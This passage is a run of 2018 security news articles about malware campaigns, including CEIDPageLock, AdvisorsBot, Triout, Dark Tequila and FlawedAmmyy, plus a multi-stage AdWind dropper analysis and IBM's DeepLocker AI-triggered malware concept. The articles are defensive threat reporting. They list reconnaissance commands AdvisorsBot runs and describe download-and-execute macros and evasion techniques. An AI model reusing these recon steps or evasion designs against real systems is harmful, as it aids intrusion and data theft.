These documents attempt to exploit an old Office vulnerability, namely CVE-2012-0158. The exploit code would drop the side-loading malware implant tracked as QCRat onto the compromised machine.
The documents, CrowdStrike discovered, use a “previously identified legitimate executable, and a side-loading implant Dynamic Link Library (DLL), as well as new implant configuration files stored as a .tlb file.”
While analyzing the command and control infrastructure associated with the campaign, the security researchers discovered indicators that the threat actor might be targeting entities in Laos as well. However, no attacks have been observed and CrowdStrike says it cannot confirm targets in Laos for this campaign, although GOBLIN PANDA has targeted this country before.
“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,” CrowdStrike concludes.
CEIDPageLock Rootkit Hijacks Web Browsers
30.8.2018 securityweek Virus
A new rootkit that has been distributed via the RIG exploit kit over the past few weeks can manipulate web browsers and also contains sophisticated defense mechanisms, Check Point says.
Dubbed CEIDPageLock, the malware was initially discovered a few months ago, when it was attempting to modify the homepage of a victim’s browser. The rootkit is currently attempting to turn the victim browser’s homepage into a site pretending to be a Chinese web directory.
On top of these sophisticated features, the latest versions of the malware monitors user browsing and, when the user attempts to access several popular Chinese websites, it dynamically replaces the content of those sites with the fake home page.
“Browser hijacking employed by malware like CEIDPageLock, can be profitable due to revenue earned via redirecting victims to search engines that share ad revenue with the referrers,” Check Point explained.
The malware’s operators also use a series of hijacking tricks to gather data on the victims’ browsing habits, such as the monitoring of visited sites, which could be used for its own ad campaigns or sold to other companies.
A dropper is used during infection, to extract a digitally signed 32-bit kernel-mode driver. The certificate was issued by Thawte but has been already revoked. After registering and starting the driver, the dropper sends the infected machine’s MAC address and user-id.
The driver is launched during startup and remains fairly stealthy, being able to evade antivirus solutions. It was designed to connect to one of two command and control (C&C) domains hardcoded in it and to download a homepage configuration to tamper the browser with.
The newer version of the malware is also packed with VMProtect, thus making analysis and unpacking difficult, especially since it is also a kernel mode driver, Check Point notes.
The iteration also includes a “redirection” capability, to send victims to the fake homepage whenever they attempt to access targeted sites. The rootkit also checks every outgoing HTTP message for specific strings and adds the process to the redirected list when a string is encountered.
The malware also blocks browsers from accessing a series of anti-virus’ files and includes the ability to create registry key in a security product.
The vast majority of CEIDPageLock’s targets are located in China, with only a negligible number of infections outside the country, Check Point says.
“At first glance, writing a rootkit that functions as a browser hijacker and employing sophisticated protections such as VMProtect, might seem like overkill. However, it seems that this simple malicious technique can be very profitable and thus the attackers believe that it is worthwhile to invest in building a stealthy and persistent tool for it,” the security firm notes.
Furthermore, the malware has the ability to execute code on an infected device. Coupled with the fact that it operates from the kernel and its persistence mechanism, CEIDPageLock is “a potentially perfect backdoor,” Check Point concludes.
"Evil Internet Minute" Report Shows Scale of Malicious Online Activity
28.8.2018 securityweek Virus
Every day, cyber threat intelligence firm RiskIQ hoovers up terabytes of internet data. It concentrates on the internet infrastructure and how it functions, gathering up domains, IP addresses, email addresses and web page materials. It does this on behalf of its customers. With booming cloud and social media, not only is there no longer a perimeter to defend, companies often don't even know what they have to defend.
The attack surface is expanding, and attackers target company brands, suppliers and customers across the internet as well as companies' own data centers. RiskIQ scans the internet to see what, where and how its customers might be vulnerable.
"We collect crawled web pages, mobile apps, social media profiles and more so that we can identify what our clients own online, so they in turn can identify any vulnerabilities or risks -- down to, for example, criminal or malicious actors who may be attempting to masquerade as their business in an effort to go after their employees, or customers, and so on," explained Brandon Dixon, RiskIQ VP of product.
"We use web crawlers," he told SecurityWeek, "which we call 'virtual users' because they have been instrumented to be able to scroll through a page as if they were a normal internet-browsing user." This instrumentation became necessary soon in the company's existence because malevolent actors began to recognize RiskIQ, and began to design their own resources to block or divert the crawlers.
"We run about 2 billion virtual user requests every day," continued Dixon. "The virtual users follow a natural path across the internet -- so, for example, they might conduct a Google search on a keyword of importance to a customer of ours. When it finds a link of relevance, the virtual user clicks on the link, visits and interrogates the page, and visits the links contained on that page. For each page we visit, we grab and save the content, grab all the remote sources from which the page is constructed, and all of the cookies and session information."
So far, RiskIQ has gathered approximately 6 petabytes of data. That's 6,000,000 gigabytes. Some of the gathered data is held for 60 days before being aged out -- but the metadata is stored forever.
The company also scans the internet and gathers mobile apps. "One of our other methods of collecting data," said Dixon, "is to do weekly -- effectively continuous -- internet scans. We run an entire sweep of the IPv4 space, looking for IP addresses that are online, and services they may be running. We'll scan up to 111 ports, in some cases allowing customers to specify a specific port." As a result, RiskIQ is able to identify servers online, the services they're running, and whether they are on or off.
"We're also downloading as many mobile app stores as possible," he added; "including the Android store and whatever we can get our hands on from Apple -- and a number of third-party global app stores and underground mobile app stores. Where possible we decompile the apps to see what permissions they use and if they call out to any blacklisted URLs."
The analysis of this data allows RiskIQ to provide its customers with an overview of threats to their wider internet estate. The analysis is performed in the company's own pipeline. "Any time we collect data," explained Dixon, "it enters that pipeline and we apply pretty complex proprietary policies that allow us to admit an event whenever something satisfies the policy. This could be something that our customers define as interesting, or something our research team has defined as interesting -- or it could just be a generic feed including, for example, a known bad/malicious event or item."
This is a huge mass of analyzed internet data. Each year, RiskIQ compiles some of that data to generate an 'evil internet minute' report (PDF). "It brings that missing sense of scale to all the malicious things that happen on the internet," he told SecurityWeek. "People don't generally have this amount of data available to them. We're in a unique position. Not only do we observe these things, we can provide a pretty heavy statistic around what is happening online for the majority of people that we serve, and we collect from."
That sense of scale is sobering. This year's Evil Internet Minute depicts a range of bad things that happen on the internet every minute of every day. This year's report, published this month, shows 0.17 blacklisted mobile apps are produced every minute (that is, one in every 6 minutes of every day). 0.21 of a new phishing domain is spun up every minute (that is, one every five minutes). 9.2 malvertising incidents occur every minute. 0.05 new hosts running crypto mining malware appear every minute (that is, one new one every 20 minutes). And four potentially vulnerable web components are discovered.
"When brands understand what they look like from the outside-in," notes an associated blog post, "they can begin developing a digital threat management strategy that allows them to discover everything associated with their organization on the internet, both legitimate and malicious, and monitor it for potentially devastating cyber-attacks."
Last month, researchers at RiskIQ connected some the dots in this huge database and discovered that the small Ticketmaster breach reported in June 2018 was actually just a small part of a major campaign, known as Magecart, designed to steal users' payment details. Incidentally, the Evil Internet Minute notes that there are 0.07 new Magecart incidents (about one in every 14 minutes) somewhere on the internet.
San Francisco, Calif.-based RiskIQ raised $30.5 million in a Series C funding round led by Georgian Partners in November 2016. It brought the total raised by the firm to $65.5 million.
AdvisorsBot Malware Downloader Discovered
24.8.2018 securityweek Virus
Proofpoint security researchers have discovered a previously undocumented downloader that appeared in malicious email campaigns targeting hotels, restaurants, and telecommunications entities.
The attacks, attributed to a threat actor tracked as TA555, are leveraging the downloader as a first-stage payload, to load a module performing fingerprinting of the targeted machine. Presumably, once a target of interest has been identified, additional modules are loaded onto the system.
Dubbed AdvisorsBot, the malware was first observed in May 2018. It is written in C and is under active development, Proofpoint says. In fact, the security firm has already observed malware versions completely rewritten in PowerShell and .NET.
The early command and control (C&C) domains used by the malware all contained the word “advisors,” hence the malware’s name.
Initially, the attacks leveraged macros to execute a PowerShell command that would fetch and run AdvisorsBot. In early August, the PowerShell command would download another PowerShell script to execute embedded shellcode that would run the downloader without writing it to disk, while the macro in the latest attacks fetched a PowerShell version of AdvisorsBot directly.
The threat includes anti-analysis features, such as the use of junk code, including extra instructions, conditional statements, and loops, to slow down reverse engineering. The x86 version of the malware contains significantly more junk code, Proofpoint security researchers have discovered.
AdvisorsBot can also detect various analysis tools and checks whether it is running on a virtual machine. More recent malware variants were improved with additional anti-analysis checks, the researchers say.
The threat communicates with the C&C server over HTTPS. The data it sends to the server includes information about the system, such as machine SID, CRC32 hash of the computer name, some unknown hardcoded values, and the Windows version.
Commands from the C&C arrive via GET requests, but the malware only includes support for two commands at the moment. Based on that, it can either load a module or load a shellcode in a thread.
Only the system fingerprinting module was observed being sent from a C&C server. It can take screenshots, extract Microsoft Outlook account details, and run a series of system commands (including systeminfo, ipconfig /all, netstat –f, net view, tasklist, whoami, net group "domain admins" /domain, and dir %USERPROFILE%\Desktop).
The most recent AdvisorsBot campaign employed a new version of the malware, rewritten using PowerShell and a .NET DLL embedded inside the PowerShell script. Tracked as PoshAdvisor, the malware is not an exact duplicate of AdvisorsBot, but is highly similar to it.
“While it remains to be seen whether this threat actor will continue to distribute AdvisorsBot, PoshAdvisor, or both in future campaigns, this pair of downloaders, with extensive anti-analysis features and increasingly sophisticated distribution techniques, warrant further investigation,” Proofpoint concludes.
CrowdStrike Adds Malware Search Engine to 'Hybrid Analysis'
22.8.2018 securityweek Virus
Endpoint security firm CrowdStrike on Tuesday announced that new search capabilities have been added to the company’s Hybrid Analysis service.
Hybrid Analysis is a free malware analysis service owned by CrowdStrike since November 2017, when it acquired Payload Security, the firm that originally developed the automated malware analysis sandbox technology.
Hybrid Analysis leverages CrowdStrike’s Falcon Sandbox, a malware analysis framework that the company claims has been used worldwide by many security operations centers, CERTs, cyber forensics labs, researchers and threat intelligence services.
Starting with August 21, Hybrid Analysis also includes malware search features powered by CrowdStrike’s Falcon MalQuery, a proprietary cloud-based malware research tool that allows industry professionals to quickly and efficiently search a massive collection of samples.
The addition of Falcon MalQuery to Hybrid Analysis allows users to quickly scan through petabytes of threat data based on YARA rules or string/binary patterns. Each search can be refined based on certain criteria, such as the type, date and size of the file.
According to the security firm, running a scan takes only minutes instead of hours, and search results can be downloaded and shared.
CrowdStrike has described the addition of Falcon MalQuery to Hybrid Analysis as donating the tool to the community.
The company has published a blog post that briefly explains how the new search capabilities work.
New Spyware Framework for Android Discovered
21.8.2018 securityweek Virus
A newly identified spyware framework can be used to build extensive surveillance capabilities into Android applications, Bitdefender security researchers warn.
Dubbed Triout, the malware made its first appearance on May 15, when a sample was uploaded to VirusTotal. Although initially submitted from Russia, most of the scans came from Israel.
The malware’s command and control (C&C) server has been running since May 2018 as well, and Bitdefender says that it appears to continue to be operational at the time of this report.
In a technical whitepaper (PDF), Bitdefender’s Cristofor Ochinca explains that the analyzed sample doesn’t use obfuscation, meaning that the security researchers gained immediate access to the source code by simply unpacking the APK file.
“This could suggest the framework may be a work-in-progress, with developers testing features and compatibility with devices,” Ochinca points out.
The spyware was discovered bundled with a repackaged application that kept the appearance and all the functionality of the original, supposedly so as not to tip victims off. The malicious payload is the only thing that sets the two apart.
Once on a compromised system, Triout can start its extensive surveillance capabilities, which range from phone call recording to GPS tracking.
Specifically, the malware can record every phone call, save it in the form of a media file, and send the recording, along with the caller ID, to the C&C server. Moreover, it can also log all incoming SMS messages to the C&C (both SMS body and sender are exfiltrated).
Triout also sends all snapped photos to the C&C, regardless of whether taken with the front or rear camera, and can send call logs to the server as well. On top of all that, it can send the device’s GPS coordinates to the C&C, and can hide itself on the infected device.
What the security researchers couldn’t determine as of now is how the infected application was disseminated.
The sample was a repackaged version of an adult application that was listed in Google Play in 2016, but was since removed. Thus, the actor might have used third-party marketplaces or attacker-controlled domains to host the sample, Bitdefender says.
Dark Tequila Banking malware targets Latin America since 2013
21.8.2018 securityaffairs Virus
Kaspersky Labs detected a sophisticated piece of banking malware dubbed Dark Tequila that was used to target customers of several Mexican banks.
Security experts from Kaspersky Labs have spotted a sophisticated strain of banking malware dubbed Dark Tequila that was used to target customers of several Mexican financial institutions.
According to the researchers, the complex Dark Tequila malware went undetected since at least 2013.
Dark Tequila is a multistage malware that spreads via spear-phishing messages and infected USB devices.
The malware steals financial data from a long list of online banking sites from infected systems, it is also able to gather credentials to popular websites, business and personal email addresses, domain registers, and file storage accounts.
The list of websites targeted by the malware includes “Cpanels, Plesk, online flight reservation systems, Microsoft Office 365, IBM Lotus Notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.”
“Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.” reads the analysis published by Kaspersky.
“A multi-stage payload is delivered to the victim only when certain conditions are met; avoiding infection when security suites are installed or the sample is being run in an analysis environment.”
Kaspersky highlighted that the level of sophistication of the threat is unusual for financial fraud schemes, it implements complex evasion techniques. The malware is delivered only if certain technical conditions are met, it is able to detect analysis environments and security solutions. infection.
Dark Tequila campaign delivers an advanced keylogger that went undetected at least for five years due to its highly targeted nature and a few evasion techniques.
According to the experts, the threat actor behind the Dark Tequila malware strictly monitors and controls all operations. In case the malware casually infects a system, a machine that is not in Mexico or that is not of interest, the malware is uninstalled remotely from the victim’s machine.
Dark Tequila has a modular structure, Kaspersky listed the following 6 primary modules:
Module 1, which is responsible for communication with the command and control server. It verifies if a man-in-the-middle network check is being performed, by validating the certificates with a few very popular websites.
Module 2 – CleanUp. If the service detects any kind of ‘suspicious’ activity in the environment, such as the fact that it is running on a virtual machine, or that debugging tools are running in the background, it will execute this module to perform a full cleanup of the system, removing the persistence service as well as any files created previously on the system.
Module 3 – Keylogger and Windows Monitor. This is designed to steal credentials from a long list of online banking sites, as well as generic Cpanels, Plesk, online flight reservation systems, Microsoft Office365, IBM lotus notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.
Module 4 – Information stealer, which is designed to steal saved passwords in email and FTP clients, as well as from browsers.
Module 5 – The USB infector. This copies an executable file to a removable drive to run automatically. This enables the malware to move offline through the victim’s network, even when only one machine was initially compromised via spear-phishing. When another USB is connected to the infected computer, it automatically becomes infected, and ready to spread the malware to another target.
Module 6 – The service watchdog. This service is responsible for making sure that the malware is running properly.
The Dark Tequila campaign is still active, further details including the IoCs are reported in the blog post published by Kaspersky.
Necurs Campaign Targets Banks
21.8.2018 securityweek Virus
A recently observed spam campaign powered by the infamous Necurs botnet has been specifically targeting banks with the FlawedAmmyy RAT, security researchers warn.
First observed in 2012, the Necurs botnet is best known for the massive Locky ransomware campaigns that it powered in 2016 and 2017. Considered the largest spam botnet in the world, Necurs was sending tens of millions of emails daily at the end of last year.
The botnet has managed to remain active by employing multiple Domain Generation Algorithms (DGA’s) and a peer-to-peer communication protocol, along with .bit domain names, Cofense’s researchers report. Over the past weeks, it has also shown an increase in activity, the security firm notes.
Last week, Necurs started sending spam emails that appeared highly targeted at the banking industry, and Cofense says that over 3,700 bank domains were targeted as recipients.
“There were no free mail providers in this campaign, signaling clear intent by the attackers to infiltrate banks specifically. […] The banks range from small regional banks all the way up to the largest financial institutions in the world,” the security firm reveals.
The main purpose of the attack was to infect recipients with the FlawedAmmyy remote access Trojan (RAT), a payload that Necurs has been delivering a few months ago.
Supposedly based on Ammyy Admin RAT’s leaked code, FlawedAmmyy can provide attackers with full control over the compromised systems. The malware can be leveraged to execute commands on the infected machine, enable remote desktop sessions, launch a file manager, view screen, and more.
The highly targeted campaign revealed yet another step in the constant evolution of Necurs: the use of .pub attachments (Microsoft Office Publisher files) to bypass security protections.
Similar to other Office applications, Microsoft Publisher supports macros, and the actor behind this campaign embedded a malicious macro in the .pub file delivered by the spam messages. The macro was designed to access a URL and execute a downloaded file.
A subset of the spam emails in this campaign, Cofense says, employed weaponized PDF files instead. These were identical to those observed in June to leverage .iqy files for malware delivery.
Compared to other attacks fueled by Necurs, this campaign was small, Trustwave points out. The security firm also confirms that all of the targeted addresses were domains belonging to banks, clearly indicating a “desire for the attackers to get a foothold within banks with the FlawedAmmyy RAT.”
Unusual Malspam campaign targets banks with Microsoft Publisher files
20.8.2018 securityaffairs Virus
Researchers from Trustwave have uncovered a malspam campaign targeting banks with the FlawedAmmyy RAT.
The peculiarity of this malspam campaign is the unusual use of a Microsoft Office Publisher file to infect victims’ systems.
Experts noticed an anomalous spike in the number of emails with a Microsoft Office Publisher file (a .pub attachment) and the subject line, “Payment Advice,” that was sent to domains belonging to banks.
This campaign is very small but appears to be very focused on banks.
The spam messages contained URLs that downloaded FlawedAmmyy remote-access trojan (RAT), a well-known backdoor.
Another interesting aspect of the campaign is that It was powered by the Necurs botnet.
“This campaign was unusual in the use of .pub files. It also appeared to originate from the Necurs botnet, a notorious botnet responsible for much mass malware distribution in the past,” reads the analysis published by Trustwave.
“Unlike previous mass campaigns, this campaign was small and, interestingly, all of the To: addresses we saw targeted were domains belonging to banks, indicating a desire for the attackers to get a foothold within banks with the FlawedAmmyy RAT.”
When the victims open the pub file, they are prompted to “Enable Macros,” earlier versions of Microsoft Publisher may display instructions to “Enable Editing” and “Enable Content”
When manually opening the Visual Basic Editor (VBA Editor) in Microsoft Publisher and clicking “ThisDocument” in Project Explorer, the VBScript executes a weaponized archive containing the RAT.
“The macro script is triggered with the function Document_Open(). As the name implies, when the file is opened, the script will access a URL and execute a downloaded file.” continues the analysis.
The malicious code leverages control objects in forms to hide the URL from which It downloads the RAT, the URL is stored in the Tag Property.
“By the time we examined the sample, the URL was not accessible anymore, but a little further research indicated this URL was used for downloading a self-extracting archive, which contained the FlawedAmmyy RAT,” researchers said.
In July, Proofpoint uncovered another massive malspam campaign delivering the FlawedAmmyy RAT that was leveraging emails with weaponized PDF documents containing malicious SettingContent-ms files.
The campaign was attributed to the financially motivated cybercriminal group TA505.
“this campaign was unusual in the use of .pub files. It also appeared to originate from the Necurs botnet, a notorious botnet responsible for much mass malware distribution in the past (see here and here).” concludes Trustwave.
“Unlike previous mass campaigns, this campaign was small and, interestingly, all of the To: addresses we saw targeted were domains belonging to banks, indicating a desire for the attackers to get a foothold within banks with the FlawedAmmyy RAT.”
Technical details, including the IoCs, are reported in the analysis published by the experts.
Malware researcher reverse engineered a threat that went undetected for at least 2 years
20.8.2018 securityaffairs Virus
The popular malware researchers Marco Ramilli has analyzed a malware that remained under the radar for more than two years.
Today I’d like to share the following reverse engineering path since it ended up to be more complex respect what I thought. The full path took me about hours work and the sample covers many obfuscation steps and implementation languages.
During the analysis time, only really few Antivirus (6 out of 60) were able to “detect” the sample. Actually, none really detected it, but some AVs triggered “generic unwanted software” signature, without being able to really figure it out. As usually, I am not going to show you who was able to detect it compared to the one who wasn’t, since I won’t ending on wrong a declaration such as (for example): “Marco said that X is better than Y”. Anyway, having the hash file I believe it would be enough to search for such information.
AntiVirus Coverage
The Sample (SHA256: e5c67daef2226a9e042837f6fad5b338d730e7d241ae0786d091895b2a1b8681) presents itself as a JAR file. The first thought that you might have as an experienced malware reverse engineer would be: “Ok, another bytecode reversing night, easy.. just put focus and debug on it…”. BUT surprisingly when you decompile the sample you read the following class!
Stage1: JAR invoking JavaScript
A Java Method that invokes (through evals) an embedded “Javascript” file ! This is totally interesting stuff :D. Let’s follow up on stages and see where it goes. The extracted Javascript (stage 2) looks like the following image. The “OOoo00” obfuscation technique has been used. Personally I do not like this obfuscation technique it’s harder to reverse respect to different obfuscation techniques, even the CTR-F takes confused on substrings, but we need to figure out what it does, so let’s try to manually substitute every string and watch-out for matching substrings (in order words %s/OOoo00/varName/g won’t work at all.
Stage 2: evaluated Javacript (obfuscated)
Manually substitution takes “forever” if you do not have a substitution framework which asks you for a string, it replaces such string (and not a substring) and eventually represents the new beautified JavaScript. After many substitutions (I really have no idea how many :D) you land on a quite readable JavaScript as the following one (click on it to make it bigger).
Stage 2: Manually Deobfuscated JavaScript
What is interesting (at least in my personal point of view) is the way the attacker (ab)used the JS-JVM integration. JavaScript takes the Java context by meaning it might use Java functions calling contextual java classes. In this stage the JavaScript is loading an encrypted content from the original JAR, using a KEY decrypts such a content and finally loads it (Dynamic Class Loader) on memory in order to fire it up as a new Java code.
The used encryption algorithm is AES and everything we need to decrypt is in this file, so let’s build up a simple python script to print our decryption parameters. The following image shows the decoding script made to easily reconstruct AES-KEY and surrounded parameters. NB: The written python code is not for production, is not protected and full of imprecisions. I made it up just for decode AES key and such, so don’t judge it, take it as a known weak but working dirty code.
Python Script to Decode AES-KEY
We now have every decoding parameter, we just need to decrypt the classes by using the following data:
ClassName
Resource (a.k.a package in where it will be contextualized)
Byte to be decrypted
Secret Key
Byte Length to be decrypted
A Simple Java Decrypter has been developed following the original Malware code. Once run, the following code was decrypted.
Stage 3 Decrypted JavaClass
Here my favorite point. As you might appreciate from the previous image we are facing a new stage (Stage 3). What is interesting about this new stage is in the way it reflects the old code. It is a defacto replica of Stage 2. We have new classes to be decrypted (red tag on the image), the same algorithm (orange label on the image), a new KEY (this time is not derived by algorithm as was in Stage 2 but simply in clear text, orange tag on the image) and the same reflective technique in which attacker dynamically loads memory decrypted content on Java.loader and uses it to decrypt again a further step, and after that it replies the code again and again. There is an interesting difference although, this stage builds up a new in-memory stage (let’s call Stage 4) by adding static GZIpped contents at the end of encrypted section (light blue tag on image). By using that technique the attacker can reach as many decryption stages as he desires.
At the end of the decryption loop (which took a while, really ) the sample saves (or drops from itself, if you wish) an additional file placed in AppData – Local – Temp named: _ARandomDecimalNumber.class. This .class is actually a JAR file carrying a whole function set. The final stage before ending up runs the following command:
java -jar _ARandomDecimalNumber.class
The execution of such a command drops on local HardDrive (AppData-Local-Temp) three new files named: RetrieveRandomNumber.vbs (2x) and RandomName.reg. The following image represents a simple ‘cat’ command on the just dropped files.
On Final Stage VBS Run Files
It’s quite funny to see the attacker needed a new language script (he already needed Java, as the original entry point, Javascript as payload decrypt and now he is using VBS ! ) to query WMI in order to retrieve installed AntiVirus and Installed Firewall information. Significative the choice to use a .reg file to enumerate tons of security tools that have been widely used by analysts to analyze Malware. The attacker enumerates 571 possible analysis tools that should not be present on the target machine (Victim). Brave, but not neat at all (on my personal point of view). The sample does not evade the system but it forces the System Kill of such a process independently if they are installed or not, just like Brute force Killing process. The sample enters in a big loop where it launches 571 sigKill one for each enumerated (.reg) analysis program. It copies through xcopy.exe the entire Java VM into AppData-Roaming-Oracle and by changing local environment classpath uses it to perform the following actions. It finally drops and executes another payload called “plugins”.
The following image shows plugins and initial new stage JAR stage.
Final Droppe Files (_RandomDec and plugins)
At a first sight experienced Malware reverser engineer would notice that the original sample finally drops a AdWind/JRat Malware having as a main target to steal files and personal information from victims. While the AdWind/JRat is not interesting per-se since widely analysed, this new way to deliver AdWind/JRat, it is definitely fascinating me. The attacker mixed up Obfuscation Techniques, Decryption Techniques, File–less abilities, Multi Language Stages and Evasions* Techniques in order to deliver this AdWind/JRat version. Multiple programming styles have been found during the analysis path. Each Stage belonging with specific programming language is atomic by meaning that could be run separately and each following stage could easily consume its outputs. All these indicators make me believe the original Sample has been built by using Malware builder, which BTW, perfectly fits the AdWind philosophy to run as a service platform.
A final consideration is about timing. Checking the VirusTotal details (remembering that only 6 on 60 AV were able to say the original JAR was malicious or unwanted) you might notice the following timeline.
Detection Time Line (VirusTotal)
VT shows the first time it captured that hash (sha256): it was in 2016. But then the first submission is on 2018-08-14 a few days ago. In such a date (2018-08-14) only 6 out of 60 detected a suspicious (malicious) behavior and triggered on red state. But what about the almost 2 years between December 2016 and August 2018? If we assume the Malware is 2 years old, was it silent until now (until my submission)? Have we had technology two years ago to detect such a threat? Or could it be a targeted attack that took almost 2 years before being deployed?
I currently have no answers to such questions, hope you might find some.
*Actually not really an evasion technique, more likely a toolset mitigation.
Further details on the malware, including the IoCs are reported in the original analysis published by Marco Ramilli
IBM Describes AI-powered Malware That Can Hide Inside Benign Applications
13.8.2018 securityweek Virus
IBM Researchers Describe "DeepLocker" as a Stealthy, Evasive, Targeted Attack Methodology in a Class of Its Own
Cybersecurity is an arms-race game of leapfrog. Adversaries gain the upper hand until they are leapfrogged by a superior technology from the defenders; which lasts as long as it takes for the adversaries to develop a new technology or methodology, and a new defensive technology is required. We have reached the point where many cybersecurity vendors claim to have gained the upper hand against adversaries through the use of artificial intelligence (AI) and machine learning (ML) threat detection.
But deep down, everyone knows this game of leap frog will continue. Adversaries are expected -- and in some cases have started -- to use their own application of AI and ML to defeat that of the defenders. At the Black Hat conference on Thursday, IBM presented just one way that black hats could do just that: a new class of AI-enhanced malware attack it calls DeepLocker.
Dr. Marc Ph. Stoecklin, principal research scientist and manager, cognitive cybersecurity intelligence, IBM Research, described the methodology to SecurityWeek. This is the IBM team that started Watson within IBM. While the team's primary purpose is to develop new AI applications to enhance security and improve threat detection, "We also need to understand where attackers are going," said Stoecklin. "So, we spend quite a lot of time understanding the threat landscape, evolutions of technologies, and how attackers are benefitting from the technology shifts going on."
AI is perhaps the major current technology shift. "With the progression and democratization of AI," warned Stoecklin, "there is a new shift going on where attackers can very easily and very quickly weaponize existing AI tools that are open source, and build highly effective and capable attacks." DeepLocker is the result of research into what is already possible, using only freely available open-source AI technology. It is not required for adversaries to develop anything new, but merely to use current technology in a new manner.
"DeepLocker," Stoecklin told SecurityWeek, "uses AI to hide any malicious payload invisibly within a benign, popular application -- for example, any popular web conferencing application. With DeepLocker we can embed a malicious payload and hide it within the videoconferencing application. Through the use of AI," he added, "the conditions to unlock the malicious behavior will be almost impossible to reverse engineer."
In short, DeepLocker is a methodology for hiding malware within a legitimate application in a manner that would prevent any researcher or threat hunter from knowing that it is there. But DeepLocker goes further. The key to unlocking and detonating the malware is the biometric recognition of a predefined target. This means that DeepLocker malware can be widely distributed to millions of users, but it will only ever activate against the precise target or targets.
"You can think of this capability as similar to a sniper attack in contrast to the 'spray and pray' approach of traditional malware," writes Stoecklin in an associated blog. "It is designed to be stealthy and fly under the radar, avoiding detection until the very last moment when a specific target has been recognized. What makes this AI-powered malware particularly dangerous is that, similar to how nation-state malware works, it could infect millions of systems without ever being detected, only unleashing its malicious payload to specified targets which the malware operator defines. But unlike nation-state malware, it is a concept that is feasible in the civilian and commercial realms."
The military 'sniper' allusion is telling. IBM would not be drawn on whether any nation-states are already using this particular technique; but it is certainly not impossible. Consider Stuxnet. It was a targeted attack against Iran, but it escaped and was ultimately reverse engineered and understood -- leading to considerable embarrassment to the U.S. government, and to a lesser degree Israel.
Had the Stuxnet payload been embedded in the DeepLocker methodology, it would (almost certainly) never have escaped and never been reverse-engineered. Attribution becomes almost impossible, and nation-states could deliver highly targeted attacks with a higher degree of impunity. Zero-day exploits could be employed with less certainty that defenders could reverse engineer and create defenses.
In the Black Hat presentation on Thursday, IBM used a Wannacry payload embedded within DeepLocker in a video conferencing application, triggered by facial recognition of the intended victim. This is a particularly pernicious example. Triggering a targeted wiper could first destroy the target's computer while removing all evidence of what had happened.
"Basically," explained Stoecklin, "we can train the AI to recognize a specific person, a specific victim or target -- and only when that person is sitting in front of a computer and can be recognized via the web cam, then a key can be derived that allows the software to unlock the malicious behavior."
The trigger can be anything -- facial recognition, behavioral biometrics, or the presence of a particular application on the system to help target a specific group or company. "Take yourself." IBM said. "As a journalist you do a lot of writing and will have your own stylometry. We could train the AI to recognize a concentration of your documents with your stylometry, and trigger on that basis. You add a couple of more -- geolocation, IP address -- and you only need a few details to uniquely recognize and identify anyone in the world."
This just leaves delivery. "Upstream," suggested IBM. Like CCleaner. CCleaner was infected by attackers and downloaded by millions of users. If the infection had been hidden in DeepLocker, only the intended target or targets would have been affected by the malware. Other upstream targets could include CMS add-ons known to be used by the target.
While the threat seems extreme, its success is not inevitable. The threat comes from the increasing use of AI-powered attacks that challenge traditional rule-based security tools. "We, as defenders," blogs Stoecklin, "also need to lean-in to the power of AI as we develop defenses against these new breeds of attack. A few areas that we should focus on immediately include the use of AI in detectors, going beyond rule-based security, reasoning and automation to enhance the effectiveness of security teams, and cyber deception to misdirect and deactivate AI-powered attacks."
At the same time, not everyone believes that DeepLocker will be undetectable. Ilia Kolochenko, CE at High-Tech Bridge, comments, “We are still pretty far from AI/ML hacking technologies that can outperform the brain of a criminal hacker. Of course, cybercriminals are already actively using machine learning and big data technologies to increase their overall effectiveness and efficiency. But," he said, "it will not invent any substantially new hacking techniques or something beyond a new vector of exploitation or attack as all of those can be reliably mitigated by the existing defense technologies. Moreover, many cybersecurity companies also start leveraging machine learning with a lot of success, hindering cybercrime. Therefore, I see absolutely no reason for panic today.”
The analysis of the code reuse revealed many links between North Korea malware
10.8.2018 securityaffairs Virus
Security researchers at Intezer and McAfee have conducted a joint investigation that allowed them to collect evidence that links malware families attributed to North Korean APT groups such as the notorious Lazarus Group and Group 123.
The experts focused their analysis on the code reuse, past investigations revealed that some APT groups share portions of code and command and control infrastructure for their malware.
Security researchers when analyzing a hacking campaign attempt to attribute it to a specific threat actor also evaluating the code reuse.
“The following graph presents a high-level overview of these relations. Each node represents a malware family or a hacking tool (“Brambul,” “Fallchill,” etc.) and each line presents a code similarity between two families. A thicker line correlates to a stronger similarity. In defining similarities, we take into account only unique code connections, and disregard common code or libraries. This definition holds both for this graph and our entire research.” reads the analysis published by the experts.
“We can easily see a significant amount of code similarities between almost every one of the attacks associated with North Korea. Our research included thousands of samples, mostly unclassified or uncategorized.”
According to the experts, North Korea-linked groups operated with two main goals, raise money and pursue nationalist aims.
Each state-sponsored hacker was involved in cyber operations with one of the above goals depending on his cyber capabilities.
Financially motivated operations consisting in hacking into financial institutions, hijack gambling sessions or sell pirated and cracked software were conducted by the Unit 180. Operations with nationalist aims are mostly executed by the Unit 121.
The joint research conducted by the experts was focused on the larger-scale nationalism-motivated campaigns, most of which presented a significant code reuse.
The experts analyzed thousands of malware samples, many still unclassified or uncategorized, and discovered many similarities in the source code used in attacks associated with North Korea.
For example, the “Common SMB module” that was part of the WannaCry Ransomware (2017) was similar to the code used the malware Mydoom (2009), Joanap, and DeltaAlfa.
“The first code example appeared in the server message block (SMB) module of WannaCry in 2017, Mydoom in 2009, Joanap, and DeltaAlfa. Further shared code across these families is an AES library from CodeProject. These attacks have been attributed to Lazarus; that means the group has reused code from at least 2009 to 2017.” states the analysis published by the experts.
The expert notices many similarities in the source code of three different remote access Trojans, tracked as NavRAT, Gold Dragon, and a DLL that was used in the attack against the South Korean gambling industry. The similarity consists in the Common file mapping.
“The second example demonstrates code responsible for mapping a file and using the XOR key 0xDEADBEEF on the first four bytes of the file. This code has appeared in the malware families NavRAT and Gold Dragon, plus a certain DLL from the South Korean gambling hacking campaign.” reads the report published by the experts.
